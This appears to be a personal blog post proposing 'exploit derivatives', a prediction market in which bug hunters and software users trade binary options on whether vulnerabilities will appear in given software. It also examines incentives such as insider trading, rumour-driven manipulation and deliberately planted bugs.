Now, Carlos' business grew slowly but consistently, since more and more business wanted to go online, and word of Carlos' exceptional customer service spread. But as his client pool grew, the time he had to spend doing maintenance increased significantly. Since each client had a slightly customized installation for one reason or another, breakage happened every time there was an upgrade scheduled, and attacks from DoS to simple malware looking for SQL injection bugs made Carlos capable to spend less and less time onboarding new customers.
Users that depend on the security of a given piece of software would fund security research and development indirectly. They would do this by taking part on an open market to protect (or "hedge") their risk against a security vulnerability on the software they depend on.

The way they would do this "hedge" is by participating on a bet. Users would bet that the software they use will have a bug. Essentially, they would be betting against their own interests. This might sound strange, but it's not. Let me give you an example.

Imagine that you went to a pub to watch a soccer game of your favorite team against some obscure small new team. There's a 90% chance your favorite team will win, but if your team happened to lose, you would feel awful (nobody wants to lose against the small new team). You don't want to feel awful, so you bet against your own team (that is, you bet that your favorite team will lose) to the guy sitting next to you. Since the odds are 9:1 in favor of your favorite team, you would have to pay 1 USD to get 10 USD back (making a 9 USD profit), which you can use to buy a pint of beer for you and your friend.

This way, in the likely case your favorite team wins, you forfeit 1 USD, but feel great, because your team won! And in the unlikely case your favorite team loses, you get 10 USD and buy a pint of beer for you and your friend. While in reality, loyalty in your team might prevent this situation from happening for most soccer fans, there's nothing stopping you to "bet" against your interests to do some damage control, and that's what is called "hedging" in finance.

This "hedge" could be used by Carlos in our example by betting that there will be a vulnerability in case he has to do an out-of-schedule upgrade on all his clients. If it doesn't happen, then good! He loses the bet, but doesn't have to do an upgrade. If he wins the bet, then he would get some money.

Companies usually do this because it reduces their volatility (eg, the quarter-to-quarter differences in returns), which makes them more stable, which in turn makes them more predictable, which means they become more valuable as a company.

Bug hunters joining the financial market

OK, this must sound like a ridiculous idea, and I must admit I worded it like this to make it sound crazy, but hang on with me for a second. Bug hunters are the ones with the most to win on this market, and I'll explain why.

Today's security researchers have a couple ways to earn money off their expertise:
  1. By contracting their expertise through a pentesting firm to software vendors, and users.
  2. By reporting bugs to the vendor, who might issue a reward in return (commonly called bug bounty programs).
  3. By reporting bugs in any way or form, and getting paid by interested parties (such as the internet bug bounty).
  4. And to a lesser extent, by hardening code, and claiming bounties for patches to OSS software (via open source bounties, or patch reward programs).
Bรถhme's proposal is to add a new source of revenue for bug hunters, as an financial instrument, that has the following properties:
  • A one-time effort continues to yield returns in the long term
  • Not finding bugs is also profitable (almost as much as finding them)
  • Vulnerability price is driven by software security and popularity
  • Provides an incentive to harden software to be more secure
These reasons make this market extremely attractive for bug hunters, specially for those able to find hard to find bugs, as explained below.

Introducing exploit derivatives

The idea is simple. Allow bug hunters to trade with each other on their confidence on the security of a given piece of software, and allow users to hedge their risk on such market.
Mallory reviews some piece of software used by Carlos, say a Wordpress Vimeo plugin. Mallory thinks that while it's very badly written, there are no vulnerabilities in the code as currently written (say, out of luck or simply because of old exploitable bugs being fixed as they were found). As a result, Mallory "bets" that there won't be a bug in the Wordpress Vimeo plugin within the next year, and is willing to bet 100 USD that there won't be a bug to anyone willing to give her 10 USD. If there's a bug, Mallory has to pay 100 USD, but if there isn't one, Mallory gets 10 USD. In other words, Mallory would get a 10% ROI (return of investment).
Carlos, as we explained above, has over a hundred customers, and deploying an update to all his customers would cost him at least one extra hour of work (in average). So, Carlos decides to take Mallory on the bet. If he loses the bet, no problem, he lost 10 USD, but if he wins, he wins some money for spending an hour on maintenance.
By allowing users to trade "bets" (or as they are called in finance binary options) with bug hunters, the market satisfies the needs of both sides (the user "hedges" his risk to the market, and the bug hunter earns money). If there happens to be a bug, Mallory has to pay, sure, and she might lose money, but in average Mallory would earn more money, since she is the one setting her minimum price.

Trading contracts with other bug hunters

Fig. 1 from Bรถhme 2006 [*]
An important aspect of this market is the ability for contracts to be traded with other bug hunters. That is because, over time the understanding of a given piece of code might change, as other bug hunters would have more time to review large code bases further and with more scrutiny.

As a result, it's important to be able to allow contracts to be exchanged and traded for a higher (if confidence in the software increased) or lower (if confidence in the software decreased) value.
Eve, on the other side of the world, did a penetration test of the Wordpress Vimeo plugin. Eve reaches a similar conclusion to Mallory, however Eve is a lot more confident on the security of the plugin. She actually had found many bugs in the plugin in the past, and all of them were patched by Eve herself, as a result, she is very confident on it's security, and offers a similar bet to Mallory's, but a bit cheaper. She is willing to bet 100 USD that there won't be a bug to anyone willing to give her 5 USD! 
At this point, Mallory can make money by simply buying this bet from Eve, unless Mallory is extremely confident there will not be a bug in the plugin. This is because if Mallory buys the bet, she will get 5 USD back no matter what happens. For example: if there is a bug, and Mallory loses the bet, she will get 100 USD from Eve, and then Mallory would give the 100 USD to Carlos. If there is no bug, then Mallory just made a 5 USD profit. This is what is known in finance as an "arbitrage opportunity".
And obviously, this allows for speculators (people that buy and sell these contracts looking to make a profit, but aren't users nor bug hunters) and market makers to join the market. Speculators and market makers provide an important service, which is that they provide "liquidity" because they would provide more "supply" of contracts than those available by just users or bug hunters (liquidity is a financial term that means it's very easy to buy and sell things on a market).

Market makers - what? who? why?

The "market makers" are people that buy or sell financial instruments in bulk at a guaranteed price. They are essential to the market, not just because they make buying and selling contracts easier, but also because they make the price a lot more stable and predictable. Usually, the market makers are the ones that end up profiting the most off the market (but they also face a lot of risks in the process).

However, in the exploit derivatives market, profit isn't the only incentive to become a market maker. Ultimately, what the market price will define will be the probability of an exploit being published before a given date. The market makers can make the exchange of a specific type of exploit derivative a lot more accessible to participants (for both, bug hunters and users), making this predictions a lot more accurate.

To give an example, imagine a market maker buys 1,000 options for "there will be a bug", and 1,000 options for "there won't be a bug" (with the same example of Carlos, Eve and Mallory). Without the market maker, Carlos would have to find Eve and Eve would have to find Mallory, which might be difficult. On the other hand, if a market maker exists, then they just need to know of the market maker at the exchange and buy/sell to it.

As long as the market makers sell as many options for each side, the risk would be minimized. The market maker would then purchase as many options as it needs to balance it's risk, or rise the price as needed (for instance, if everyone wants to buy "there will be a bug", then it has to increase it's price accordingly).

And in case it wasn't obvious by now, the more "liquidity" on the market, then the more accurate the prices become. And the more accurate they become, the more value there is in exploit derivatives as a "prediction" market. Note that another service provided by this is the decentralized aggregated knowledge of the security community to predict whether a vulnerability exists or not, and that provides value to the community in and of itself[*].

What happens if there's a bug?

When someone finds a bug, then the finder can make a lot of money! And that's the whole point of this blog post. This creates a strong financial incentive to do security research and make money off it in a more distributed manner that is compatible with existing vulnerability reward programs.

The way this would work is, when you find a bug, you just buy as many "bets" for "there will be a bug" as you can, and you just report it to the vendor, or post it to full disclosure.. whatever works for you. This will essentially guarantee you will win the bet, and make a profit.

What's most interesting about this, is that the profit you can make is defined by the market itself, not the vendor. This means that the software that the market believes to be most secure, as well as the most popular software would yield the most money. And this actually incentivizes bug hunters to look at the most important pieces of infrastructure for the internet at any given point in time.

This also is likely to provide a higher price for bugs than existing security reward programs, and since they aren't incompatible (as currently defined), there isn't a concern on getting both a reward and returns from the market.

Note this is actually the same as when you don't find a bug, except that not finding a bug yields profits from those trying to limit the risk of the existence of a vulnerability, and finding one yields profits from those that didn't find the bug.

Funding hardening and secure development

One of the best things from this market, is that it would create a financial incentive to write secure software, and harden/patch existing software, which is something that our industry hasn't done a particularly great job at.

There are two ways to fund secure development with exploit derivatives:
  • By bug hunters that have a long bet on the security of a product, and protecting their liability
  • By donations to software vendors contingent on having no vulnerabilities for some time
Let me explain. If a bug hunter has a one-year bet that there won't be a new bug, unless the project has very little development, and has a history of being very secure, the bug hunter has a strong incentive to make sure new bugs are hard to introduce. This bug hunter could do it by refactoring APIs to be inherently secure, and improve test coverage, and the project's overall engineering practices.

The other way it funds secure development is by making donations contingent on the absence of vulnerabilities. It would be possible to make a donation, of say 50 USD to an open source project, and give an extra 50 USD only if there are no vulnerabilities for a year (and if there are, the user can get his money back).

Who decides what's a valid bug?

Who would be the decider for what is and isn't a bug? At the end, these people would have a lot of power on such a market. And per my experience on the vendor side of vulnerability reward programs, what is and isn't a bug, is often difficult to decide objectively.

To compensate for such risk, as with any financial decision, one must "diversify" - in this case, diversify, means choose as many "referees" (or "bug deciders") as possible.

On today's day and age CERTs provide such service, as well as vendors (through security advisories). As a result, one can make a bet based on those pieces of information (eg. CVSSv3 score above 7.0 or bounty above $3,000). However, these might not always mean what the user wants to represent, and for those cases it would be better to create an incentive for market-specific deciders to make decisions.

One way to solve this problem, as pointed out by Bรถhme is to make the conditions as clear as possible (which could make arbitration very cheap). One could imagine a VM or a docker image  that is preconfigured and includes some "flags", that if, under a specific attack scenario (eg, same network, remote attacker, minimal user interaction) might result in compromise of a "flag". This is akin to CTF competition, and would be quite obvious in the majority of cases.

For more complex vulnerabilities or exploits, one might want human judgment to decide on the validity of an exploit. For example, the recent CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow has specific requirements that are clearly exploitable for most users, but might seem ridiculous to others. Having a trusted referee with sufficient expertise to decide and have a final say would go a long way to create a stable market.

And this actually creates another profit opportunity to widely known, and trusted bug hunters. If the referees get a fee for their services, they can make a profit simply for deciding whether a piece of software has a known valid vulnerability or not. The most cold-headed impartial referees would eventually earn higher fees based on their reputation on the community.

That said, human-based decisions would introduce ambiguity, and the more judgment you give the referees, the more expensive they become (essentially to remove the incentive of being bribed). While reputation might be something to prevent misbehavior by referees, in the long term, it would be better for the market (and a lot cheaper) to use CTF-style decisions, rather than depending on someone's judgment.

Vulnerability insurance and exploit derivatives

It's worth noting that while exploit derivatives look similar to insurance, they are quite different. Some important differences from insurance are:
  • For insurance you would usually only get the money you can demonstrate a loss for. In this case, money changes hands even when there is no loss! In other words, if a user buys an insurance to cover losses for getting hacked, they will get all costs covered up to a specific amount. But in hedging, even if there is no loss you anyway get the money (this essentially makes hedging a lot more expensive than insurance).
  • Another important difference is that insurers won't write an insurance policy to anyone, while anyone can trade a binary option as long as they have the funds to do so. This is because your personal risk of loss is irrelevant to the market. When you are trading options your identity is irrelevant.
That said, one could easily build an insurance contract on top of exploit derivatives. Insurance would reduce the price of the policy by only paying for actual demonstrable losses, and would fluctuate the price of the policy depending on the risk each policy holder bears.

Note, however, that this is not the only way to do it, there is a lot of research on the subject of hedging risks with "information security financial instruments" lead by Pankaj Pandey and Einar Arthur Snekkenes, whom explain how several different incentives and markets can be built for this purpose[1][2][3][4].

Incentives, ethics and law

Exploit derivatives, might create new incentives, some that might look eerie, mostly related to different types of market manipulation:
  • Preventing vulnerability disclosure
  • Transfer risk from vendors to the community
  • Spreading lies and rumors
  • Legality and insider trading
  • Introducing vulnerabilities on purpose
I think it's interesting to discuss them, mostly because while some raise valid concerns, some others seem to be just misunderstandings, which we might be able to clarify. Think of this as a threat model.

Preventing vulnerability disclosure

An interesting incentive that Micah Schwalb pointed out in his paper from 2007 on the subject ("Exploit derivatives and national security"), is that software vendors in the United States might have several resources at their disposal to prevent the public disclosure of security vulnerabilities. In specific, he pointed out how several laws (DMCA, Trade Secrets, and Critical Infrastructure statutes) have been used, or could be used by the vendors to keep vulnerabilities secret for ever.

It's clear that if vulnerabilities are never made public, it's very difficult to create a market like Exploit Derivatives, and that was the main argument Schwalb presented. However, we live in a different world now, where public disclosure of vulnerabilities is not only tolerated by software vendors, but celebrated and remunerated via vulnerability reward programs.

The concerns that Schwalb presented would still be valid for vendors that attempt to silence security research, however, fortunately for customers, a lot of vendors take a more open and transparent approach where public discussion of (fixed) vulnerabilities is supported by our industry.

Transfer risk from vendors to the community

One interesting consequence of a market like this, as pointed out by David, is that this market would transfer the financial risk of having a security vulnerability away from the software vendor, and push it towards the security community. That is because if the vendor is not involved, then the vendor can't lose any money for writing insecure software in the market.

However, the most important aspect to notice here, is that the vendor is part of the market in a way, even if it doesn't want to be, and that is because the vendor is the only one that can make the software better (for non-free software). If the software "security" trades for a very low price, then there's a clear financial incentive for the vendor to improve it's security (for example, if some given software has a demand of bets that pay 9:1 that there will be a bug, the vendor can earn 10x it's investment if it can make it so that there are no bugs anymore). So yes, the vendor doesn't have to absorb any risk on having a vulnerability, but it instead gets an incentive to improve the software.

Eventually, the vendor would stop investing in security as soon as the market stops demanding it, leading to software that is as secure as it's users want it to be (or more, if the vendor wants to, for any other reasons).

Spreading lies and rumors

Real markets have historically been vulnerable to social engineering. In fact, there are countless examples on cases when media misunderstandings or mistranslations have caused dire consequences to the economy.

Additionally, things like ZDI's upcoming advisories list would suddenly become extremely profitable, if someone was to hack or MITM that page, at the right time. Same for "side channels" for security vulnerabilities, or embargoes of vulnerabilities in popular software.

But also, as lcamtuf pointed out, some of these channels might even come without the need of any targeted attack. Things like an early heads up from a trusted maintainer, which could be spoofed, or things like wiki pages used to make security announcements, if anyone can edit them, they could easily be used to manipulate the market.

If any, the media tends to exaggerate news stories. A small vulnerability is always amplified a hundred times by the media, which could cause chaos in the market. At this point, referees wouldn't even have to be involved, and trading would just be based on speculation.

But this is a perfect arbitrage opportunity, for those that get a chance to notice it. In this case, one could check the headers of the email, or could double check the statement with the maintainer, or just see who made the update to the wiki. If something looks fishy, then an speculator would be able to capitalize on the market uncertainty and balance the price back to normal. This is essentially how the free market deals with this risk on other markets.

Finally, this would incentivize software maintainers to improve their security patch release coordination. Perhaps it would make CERT more popular, or at least it would create an incentive for CERT to act as a trusted third party for the release and scoring of software vulnerabilities, which would also end up being good for the market.

Insider trading and vulnerabilities

If you thought of insider trading when reading about creating a vulnerability market, then you are not alone. But insider trading is a commonly misunderstood concept, and exploit derivatives doesn't exactly apply for most freelance bug hunters (although, it might apply to developers and employees of some companies). Let me explain.

Insider trading is essentially when someone with a "fiduciary duty" (will explain below) with access to non-public information makes a trade in the market. You might think that this means that if someone finds a bug, they would be committing insider trading if they "bet" that there would be a bug, but for most bug hunters this really shouldn't be the case.

First of all, for open source software, where no binary analysis nor reverse engineering is required, the bug hunter would be acting with public information (the source code) when making the trade. The fact the bug hunter was able to see a vulnerability is equivalent to a financial analyst being able to see an arbitrage opportunity in the market.

Another point is that the majority of bug hunters shouldn't have "fiduciary duty" to other market participants, so there shouldn't be a conflict of interest there. Here's the definition of fiduciary duty.
A fiduciary duty is a legal duty to act solely in another party's interests. Parties owing this duty are called fiduciaries. The individuals to whom they owe a duty are called principals. Fiduciaries may not profit from their relationship with their principals unless they have the principals' express informed consent.
https://www.law.cornell.edu/wex/fiduciary_duty
Employees (either developers, bug hunters or else) of companies that use the software, however, might be restricted from engaging in such trades, depending on how they got the information, and when[*]. For a final say on the subject, participants would have to get advice from a lawyer with experience in "Securities and Corporate Law".

Note, however, that insider trading wouldn't necessarily be bad for this market [1][2], and this wouldn't even be something one would need to think about until a market like this is regulated (if it is regulated at all), but either way, that's a discussion better to be left between economists and lawyers, not security researchers :)

On the other hand, looking at the benefits of having companies participate in this market:
  • Employers could give exploit derivatives as compensation to employees in bundles that pay if there are no public exploits, as a way to incentivize security, which would be good for both, the users and the market. Equity is already a big part of the compensation for most companies, specially startups, so adding a new instrument as compensation would provide a more concrete mechanism for developers to influence it's value (by writing more secure software).
  • Victims of 0-day vulnerabilities would have a financial incentive to try and recover the exploit used to attack them (via forensics, reverse engineering or else), as today there's very little incentive for victims to speak out and share technical details. This could of course be done anonymously, as the community would only care about the technical details, and less so of the identity of the victim.

Introducing vulnerabilities on purpose

The most dangerous incentive that a market like this could create is that of introducing vulnerabilities on purpose. Fraud like this is also a danger to the trustworthiness of the market, and because of the distributed nature of open source software, it would be very hard for someone to even try to bring civil or criminal charges to someone that did this. However, this should be addressed by the market in two ways:
  • Price - Software that accepts third-party contributions and has little oversight over them, or with a large development team that might not be as trustworthy would yield low returns for backdoors or bugs introduced on purpose. And while introducing a vulnerability without being noticed is definitely possible, software with strict engineering practices and stringent code reviews processes would end up being the highest valued in the market.
  • Competition - Participants in the market with long-term investments on the security of software will compete with those trying to introduce bugs. Practically, the stakes are the same on both sides, so it would be as easy to make money by making software safer than the opposite (without the risk it incurs by introducing bugs on purpose).
Finally, these could also be mitigated by donations that pay maintainers only if there are no vulnerabilities. Contracts would be structured in ways to limit the risk (say, by requiring code to be in the code base for a long time) and make this avenue less profitable than making the software more secure.

At the end, we would end up incentivizing open source software maintainers to be more careful with the patches they accept, and employ safer engineering practices for the project. We would also create more oversight by interested third parties, and hopefully, by way of it, make software safer as a result.

Conclusions

If you've reached so far down the blog post, you might either be as excited about this as I am, or yu are waiting for me to pitch you my new startup! Well, fear not.. There is no startup, but I am most definitely ready to abuse your enthusiasm and encourage you to help make this a reality! Either by sharing your thoughts, sharing this to your friends or reviewing it's design.

Exploit derivatives was a bit popular a few years after it was published, but it didn't get wide enough attention in the security community (although in 2011, projects like BeeWise and Consensus Point briefly experimented with it).

It seems, that in 2006 our industry had little experience on vulnerability markets, and in 2011 it was too complex and expensive to setup a prediction market, which probably made the upfront cost to setup this market extremely high. But fast-forward to 2016, when prediction markets for many fields abound[1][2][3] for varied topics such as politics, economics, or entertainment. And when creating decentralized markets with cryptocurrency is not only possible and accessible, but also being very heavily invested by the security and open source community already (although, surprisingly, not for software security!).

I think experimenting on this market using a cryptocurrency would allow us to very quickly test the idea. For example, we could use Augur[despite it's controversy], a recently launched project (currently in Beta, so no money is being exchanged yet), that creates a decentralized prediction market which can be used for exploit derivatives among other things (and most importantly, has an API that could be used to build a security vulnerability prediction market on top of it).

Anyway, to finalize this blog post, I have one last request. If you are interested to discuss about exploit derivatives I just created a mailing list to talk about it here:
There's nothing on it yet, but I would love to hear your feedback! Positive and negative. Specially if you or someone you know has experience on security research, financial markets or security economics.

I would be particularly interested to hear from you if you think this might have other positive or negative incentives in the security or open-source community.

Thank you for reading, and thanks to Rainer, Pankaj, Michal, David, Miki, Dionysis and Mario for their comments.

Note that this is a personal blog. What I say in this blog does not imply in any form an endorsement from my employer, nor necessarily reflects my employer's views or opinions on the subject.